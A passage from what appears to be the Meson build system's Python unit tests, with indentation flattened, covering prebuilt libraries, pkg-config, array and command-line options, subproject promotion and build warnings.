rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
for lang in ('c', 'cpp'):
for target_type in ('executable', 'library'):
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main() {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform pathes passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targetting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targetting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targetting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targetting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
